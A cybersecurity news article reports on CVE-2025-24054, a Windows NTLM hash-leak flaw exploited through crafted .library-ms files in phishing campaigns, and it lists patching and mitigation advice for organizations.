The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new Windows security flaw, CVE-2025-24054, to its Known Exploited Vulnerabilities (KEV) catalog. This means the vulnerability is currently being used in real-world cyberattacks.
This medium-severity vulnerability affects Microsoft Windows systems and allows hackers to steal NTLM password hashes simply by tricking a user into downloading or interacting with a malicious file. Although Microsoft rated it as “Exploitation Less Likely,” recent reports confirm that attackers have already started taking advantage of it.
What is CVE-2025-24054?
CVE-2025-24054 is a NTLM hash disclosure spoofing vulnerability in Microsoft Windows. It has a CVSS score of 6.5, marking it as a moderate but important threat. Microsoft patched this flaw in March 2025 during its regular Patch Tuesday updates.
The vulnerability involves NTLM (New Technology LAN Manager), an older authentication protocol used by Windows to verify user identities. Microsoft officially deprecated NTLM in favor of Kerberos, but many systems and applications still use it. This makes NTLM a favorite target for cybercriminals.
When exploited, this vulnerability allows hackers to perform NTLM spoofing attacks over a network, using specially crafted files that can trick Windows into sending sensitive password hashes to an attacker-controlled server.
How the Exploit Works
According to Microsoft, attackers can trigger this vulnerability using a file with the .library-ms extension. These files can be disguised as legitimate documents, making them easy to distribute via malspam (malicious email spam).
Victims only need to click once, right-click, or interact in any way with these malicious files for the exploit to activate. The files don’t even need to be opened or executed—just previewing them can be enough to leak NTLM password hashes.
Once these hashes are exposed, hackers can use them in pass-the-hash or relay attacks to gain unauthorized access to systems and move laterally across a network.
Active Attacks Have Already Begun
Cybersecurity firm Check Point confirmed that CVE-2025-24054 has been actively exploited since March 19, 2025. One of the first observed campaigns targeted government and private organizations in Poland and Romania.
In these attacks, threat actors sent emails containing a Dropbox link. This link led to a ZIP archive with malicious files exploiting CVE-2025-24054 and other known bugs. Simply downloading and extracting the ZIP file was enough to trigger the vulnerability and send the user’s NTLMv2 hashes to a remote server controlled by the attackers.
In some newer attacks observed as late as March 25, 2025, the file was delivered without compression, making it even easier to execute. The file was named “Info.doc.library-ms” and required minimal user interaction to launch the attack.
Check Point reports that at least 10 separate phishing campaigns have used this method to steal NTLM credentials since the vulnerability became known.
Similarities to Previous Exploits
CVE-2025-24054 is considered a variant of CVE-2024-43451, another NTLM-related flaw patched in November 2024. That vulnerability was also weaponized by threat groups like UAC-0194 and Blind Eagle in attacks on Ukraine and Colombia.
Like its predecessor, CVE-2025-24054 relies on exploiting SMB authentication requests, which are automatically triggered by Windows Explorer when interacting with certain file types. These requests can leak NTLM hashes to a remote server without any obvious warning to the user.
Why This Matters for Organizations
The ongoing exploitation of this NTLM spoofing vulnerability highlights several important cybersecurity lessons:
Minimal user action is required to trigger the exploit.
NTLM credentials are still widely used, even though the protocol is outdated.
Attackers are moving quickly, launching campaigns just days after the patch was released.
Once attackers obtain NTLM hashes, they can use them to gain unauthorized access, move laterally, and escalate privileges within compromised networks. This makes the vulnerability particularly dangerous for organizations that haven’t yet applied the patch.
What You Should Do Now
CISA has directed all Federal Civilian Executive Branch (FCEB) agencies to apply the patch for CVE-2025-24054 no later than May 8, 2025. However, all organizations—public and private—are strongly advised to take action immediately.
Here’s what IT teams should do:
Apply the latest Windows security patches released in March 2025.
Disable NTLM authentication where possible and switch to Kerberos.
Monitor file downloads and email attachments, especially those ending in .library-ms.
Educate users about the risks of phishing emails and suspicious files.
Use endpoint detection tools to identify and block malicious file behavior.
Final Thoughts
The active exploitation of CVE-2025-24054 shows that even medium-risk vulnerabilities can pose major threats if left unpatched. The simplicity of this attack—requiring almost no user interaction—makes it a serious concern for cybersecurity teams.
Organizations should treat this flaw as high-priority and patch their systems without delay. In today’s fast-moving threat landscape, even small oversights can lead to big breaches.
Follow us on 
(Twitter) for real time updates and exclusive content.